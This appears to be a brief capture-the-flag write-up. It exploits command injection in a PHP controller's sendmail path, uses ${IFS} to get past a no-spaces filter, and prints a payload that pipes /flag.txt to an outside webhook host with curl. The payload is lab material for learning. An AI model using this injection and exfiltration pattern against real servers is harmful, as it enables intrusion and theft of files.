Once we downloaded the files, we inspect the Dockerfile. As we can see, the flag is stored in /flag.txt:
So I decided to take a look at IndexController.php:
First of all, we canโt use spaces, and then the $sendMailPath is vulnerable to Command Injection. In this case, we can use a special environment of Unix systems which is ${IFS}, that stands for โInternal Field Separatorโ. It is used by the shell to separate words in a command (like the space, the tab or a newline).
- Iโve created a note related to this, because it seems interesting to me to have this stored here since now: Unix Environment Variables ๐
Payload: /usr/sbin/sendmail;curl${IFS}<https://YOUR_IP>/?x=$(cat${IFS}/flag.txt)
So here Iโll be using Webhook.site to have a temporally web server and send there the curl output:
Now I checked the webserver:
